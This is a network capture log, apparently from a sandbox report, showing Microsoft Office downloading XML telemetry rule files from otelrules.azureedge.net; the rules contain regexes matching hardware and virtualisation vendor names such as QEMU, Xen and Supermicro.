2024-11-02 16:56:37 UTC	192	OUT	GET /rules/rule120665v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:37 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:37 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D30478D" x-ms-request-id: 162cf1ac-401e-002a-0c09-2dc62e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165637Z-16547b76f7f775p5hC1DFWzdvn00000000ug00000000m9bw x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:37 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.7	49791	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:37 UTC	192	OUT	GET /rules/rule120668v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:37 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:37 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3CAEBB8" x-ms-request-id: 5df09d77-001e-00a2-0c15-2dd4d5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165637Z-15869dbbcc6ss7fxhC1DFWnrpc00000000r0000000009u0v x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:37 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.7	49790	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:37 UTC	192	OUT	GET /rules/rule120667v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:37 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:37 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BB9B6040B" x-ms-request-id: 489be2eb-a01e-0070-7b32-2c573b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165637Z-176bd8f9bc55csg5hC1DFW6yfn00000002dg00000000e54r x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:37 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.7	49792	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:37 UTC	192	OUT	GET /rules/rule120669v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:37 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:37 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB5284CCE" x-ms-request-id: 2ff20288-601e-0084-1c49-2c6b3f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165637Z-r159446fcd75mmzxhC1DFW9r5800000001p000000000atq0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:37 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.7	49794	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:38 UTC	192	OUT	GET /rules/rule120670v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:38 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:38 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91EAD002" x-ms-request-id: 86fb44b9-501e-0078-06d2-2c06cf000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165638Z-16547b76f7fj5p7mhC1DFWf8w4000000010g00000000bgum x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:38 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.7	49796	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:38 UTC	192	OUT	GET /rules/rule120671v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:38 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:38 GMT Content-Type: text/xml Content-Length: 432 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT ETag: "0x8DC582BAABA2A10" x-ms-request-id: 392771d5-701e-000d-1cd2-2c6de3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165638Z-16547b76f7f775p5hC1DFWzdvn00000000ug00000000m9cw x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:38 UTC	432	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.7	49797	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:38 UTC	192	OUT	GET /rules/rule120673v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:38 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:38 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT ETag: "0x8DC582BB464F255" x-ms-request-id: 44d502e9-701e-000d-5c08-2c6de3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165638Z-16547b76f7fxdzxghC1DFWmf7n0000000130000000003c82 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:38 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.7	49798	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:38 UTC	192	OUT	GET /rules/rule120674v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:38 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:38 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA4037B0D" x-ms-request-id: 43524bb3-601e-003e-69d2-2c3248000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165638Z-15869dbbcc6lq45jhC1DFW7zwg00000000vg000000009k34 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:38 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.7	49795	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:38 UTC	192	OUT	GET /rules/rule120672v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:38 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:38 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA740822" x-ms-request-id: 1d289f04-201e-0003-7b2a-2cf85a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165638Z-r159446fcd7tc5j5hC1DFWrhs000000001zg000000000ttg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:38 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.7	49799	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:39 UTC	192	OUT	GET /rules/rule120675v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:39 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:39 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6CF78C8" x-ms-request-id: 1ec43ba4-f01e-0003-65d2-2c4453000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165639Z-16547b76f7fkcrm9hC1DFWxdag00000000wg00000000qcn6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:39 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.7	49800	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:39 UTC	192	OUT	GET /rules/rule120676v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:39 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:39 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B984BF177" x-ms-request-id: 9ec2e68b-201e-0096-6cd2-2cace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165639Z-16547b76f7f76p6chC1DFWctqw000000012g000000005syp x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:39 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.7	49801	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:39 UTC	192	OUT	GET /rules/rule120677v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:39 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:39 GMT Content-Type: text/xml Content-Length: 405 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT ETag: "0x8DC582B942B6AFF" x-ms-request-id: 98e0f543-201e-0033-7555-2bb167000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165639Z-176bd8f9bc5hwksrhC1DFWf9wg00000002b0000000007b68 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:39 UTC	405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" 